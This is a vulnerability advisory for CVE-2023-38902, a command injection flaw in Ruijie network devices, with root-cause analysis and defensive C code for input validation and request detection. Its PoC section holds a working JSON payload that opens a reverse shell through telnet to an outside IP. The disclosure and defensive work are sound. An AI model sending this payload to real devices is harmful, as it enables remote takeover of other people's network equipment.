Headline
CVE-2023-38902: CVE ruijie report
A command injection vulnerability in RG-EW series home routers and repeaters v.EW_3.0(1)B11P219, RG-NBS and RG-S1930 series switches v.SWITCH_3.0(1)B11P219, RG-EG series business VPN routers v.EG_3.0(1)B11P219, EAP and RAP series wireless access points v.AP_3.0(1)B11P219, and NBC series wireless controllers v.AC_3.0(1)B11P219 allows an authorized attacker to execute arbitrary commands on remote devices by sending a POST request to /cgi-bin/luci/api/cmd via the remoteIp field.
CVE-ID
CVE-2023-38902
Information
Vendor of the products: Ruijie Networks
Vendor’s website: https://www.ruijienetworks.com/
Reported by: Wang Jincheng ([email protected]), He Nan ([email protected])
Affected products: RG-EW Series Routers and Repeaters, RG-NBS and RG-S1930 Series Switches, RG-EG Series business VPN Routers, RG-EAP and RG-RAP Series Wireless APs, RG-NBC Series Wireless Controllers
Affected firmware version: EW_3.0(1)B11P219, SWITCH_3.0(1)B11P219, EG_3.0(1)B11P219, AP_3.0(1)B11P219, AC_3.0(1)B11P219
Firmware download address: ReyeeOS219
Overview
A command injection vulnerability in RG-EW series routers and repeaters v.EW_3.0(1)B11P219, RG-NBS and RG-S1930 series switches v.SWITCH_3.0(1)B11P219, RG-EG series business VPN routers v.EG_3.0(1)B11P219, RG-EAP and RG-RAP series wireless access points v.AP_3.0(1)B11P219, and RG-NBC series wireless controllers v.AC_3.0(1)B11P219 allows an authorized attacker to execute arbitrary commands on remote devices by sending a POST request to /cgi-bin/luci/api/cmd via the remoteIp field.
Vulnerability details
Analyzing the /usr/lib/lua/luci/modules/cmd.lua file reveals that operation types such as devConfig or devSta and operators such as get or set can be arbitrarily combined into different method fields. For instance, selecting the devConfig.get method triggers the doParams(params) function, where params is the JSON body sent in the POST request. Subsequently, the fetch function is invoked, which ultimately calls the uf_client_call function from /usr/lib/libunifyframe.so. From there the data is transmitted over a socket to /usr/sbin/unifyframe-sgi.elf.
In /usr/lib/libunifyframe.so, the value of remoteIp is parsed from a1[5], where a1 is the base address of the JSON data object. Because a1 is of type DWORD* (four bytes per element), a1[5] is the value at byte offset 20 from the base, i.e. *(a1+20), which is the remoteIp field.
Within /usr/sbin/unifyframe-sgi.elf there is a command injection vulnerability. The first %s format specifier in the snprintf call corresponds to *(a1+20), which is the value of the params.remoteIp field of the POST request. This value is user-controllable, so arbitrary commands are executed when the ufm_popen function is invoked on the formatted string.
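The root cause described above is a remote-supplied string formatted straight into a command line that is then handed to a popen-style shell. The following is an added example, not Ruijie's code and not taken from unifyframe-sgi.elf, showing how a remoteIp-style field can be handled safely: validate it as an address literal before use, and run the resulting command through execv() with a separate argv element rather than through a shell. The command template ("ping -c 1 <ip>") and the function names are hypothetical; the advisory does not name the real command.

```c
/* Added example, not Ruijie's code: safe handling of a remoteIp-style field.
 * The ping command below is a hypothetical stand-in for whatever the real
 * binary formats the address into. */
#include <arpa/inet.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Allowlist validation: accept only a syntactically valid IPv4 or IPv6
 * literal. inet_pton() fails on anything else, so "$(...)", ";", "|",
 * backticks and whitespace never get past this point. */
bool remote_ip_is_valid(const char *s)
{
    unsigned char buf[sizeof(struct in6_addr)];
    if (s == NULL || *s == '\0' || strlen(s) >= INET6_ADDRSTRLEN)
        return false;
    return inet_pton(AF_INET, s, buf) == 1 ||
           inet_pton(AF_INET6, s, buf) == 1;
}

/* Build an argv vector instead of one command string. The address becomes
 * its own argv element, so when execv() runs it no shell ever parses it:
 * metacharacters are just bytes inside a single argument.
 * Returns the number of entries (excluding the terminating NULL), or -1 if
 * the address is rejected or the vector is too small. */
int build_ping_argv(const char *remote_ip, const char *argv[], size_t max)
{
    if (!remote_ip_is_valid(remote_ip) || max < 5)
        return -1;
    argv[0] = "/bin/ping";   /* hypothetical command for illustration */
    argv[1] = "-c";
    argv[2] = "1";
    argv[3] = remote_ip;
    argv[4] = NULL;
    return 4;
}

/* Run the command via fork()/execv(), i.e. without /bin/sh (contrast with
 * popen()). Returns the child's exit status, or -1 on rejection/failure. */
int run_ping(const char *remote_ip)
{
    const char *argv[5];
    if (build_ping_argv(remote_ip, argv, 5) < 0)
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execv(argv[0], (char *const *)argv);
        _exit(127);          /* exec failed */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed inputs: a benign address and the substitution shape
     * used in the advisory's PoC. */
    const char *benign = "192.168.1.1";
    const char *hostile = "$(id)";
    printf("%s -> %s\n", benign,
           remote_ip_is_valid(benign) ? "accepted" : "rejected");
    printf("%s -> %s\n", hostile,
           remote_ip_is_valid(hostile) ? "accepted" : "rejected");
    return 0;
}
```

Validation alone already closes the injection, because the rejected value never reaches a formatting call; dropping the shell with execv() is defence in depth, so that even a validation mistake cannot turn into command execution.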
Poc
Send the following POST request to /cgi-bin/luci/api/cmd.
{ "method": "devConfig.get", "params": { "module": "123", "remoteIp": "$(mkfifo /tmp/test;telnet 192.168.45.203 6666 0</tmp/test|/bin/sh > /tmp/test)", "data": { "kkk": "abc" } } }
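For defenders who cannot patch immediately, the request shape above is easy to flag at a reverse proxy or in access logs: a POST to /cgi-bin/luci/api/cmd whose remoteIp value contains anything other than address characters. The following is an added example, not part of the advisory or of any Ruijie software, and its JSON scanning is deliberately minimal (it handles the flat string value shown in the PoC, not arbitrary JSON); the sample bodies in main() are constructed.

```c
/* Added example, not from the advisory: flag POST bodies to
 * /cgi-bin/luci/api/cmd whose remoteIp value is not a plain address. */
#include <ctype.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Copy the string value of "remoteIp" out of a JSON body into out.
 * Minimal scanner sufficient for the request shape in the PoC: it finds the
 * key, skips ':' and whitespace, and copies up to the closing quote,
 * honouring backslash escapes. Returns false if the key is absent or the
 * value is not a string. */
bool extract_remote_ip(const char *body, char *out, size_t outlen)
{
    const char *key = "\"remoteIp\"";
    const char *p = strstr(body, key);
    if (p == NULL || outlen == 0)
        return false;
    p += strlen(key);
    while (*p && (isspace((unsigned char)*p) || *p == ':'))
        p++;
    if (*p != '"')
        return false;
    p++;
    size_t n = 0;
    while (*p && *p != '"' && n + 1 < outlen) {
        if (*p == '\\' && p[1])
            p++;                 /* keep the escaped char, drop the backslash */
        out[n++] = *p++;
    }
    out[n] = '\0';
    return true;
}

/* An address literal consists of hex digits, dots and colons only. Anything
 * else (command substitution, redirection, pipes, spaces) is suspicious. */
bool remote_ip_is_suspicious(const char *v)
{
    for (; *v; v++)
        if (!(isxdigit((unsigned char)*v) || *v == '.' || *v == ':'))
            return true;
    return false;
}

/* Returns true if the request should be flagged: right endpoint, remoteIp
 * present, and its value is not a plain address. */
bool flag_request(const char *path, const char *body)
{
    char ip[256];
    if (strcmp(path, "/cgi-bin/luci/api/cmd") != 0)
        return false;
    if (!extract_remote_ip(body, ip, sizeof ip))
        return false;
    return remote_ip_is_suspicious(ip);
}

int main(void)
{
    /* Constructed sample bodies: the first mirrors the PoC's shape, the
     * second is a normal request carrying a real address. */
    const char *samples[] = {
        "{\"method\":\"devConfig.get\",\"params\":{\"module\":\"123\","
        "\"remoteIp\":\"$(id)\",\"data\":{\"kkk\":\"abc\"}}}",
        "{\"method\":\"devConfig.get\",\"params\":{\"module\":\"123\","
        "\"remoteIp\":\"192.168.45.203\",\"data\":{}}}",
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("sample %zu: %s\n", i,
               flag_request("/cgi-bin/luci/api/cmd", samples[i]) ? "FLAG" : "ok");
    return 0;
}
```

The character allowlist is intentionally stricter than a full IP parser: a hostname would also be flagged, which is the right side to err on for a field that the firmware passes to a shell.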
Attack Demonstration
Related news
An issue in RG-EW series home routers and repeaters v.EW_3.0(1)B11P204, RG-NBS and RG-S1930 series switches v.SWITCH_3.0(1)B11P218, RG-EG series business VPN routers v.EG_3.0(1)B11P216, EAP and RAP series wireless access points v.AP_3.0(1)B11P218, and NBC series wireless controllers v.AC_3.0(1)B11P86 allows a remote attacker to execute arbitrary code via the unifyframe-sgi.elf component in sub_40DA38.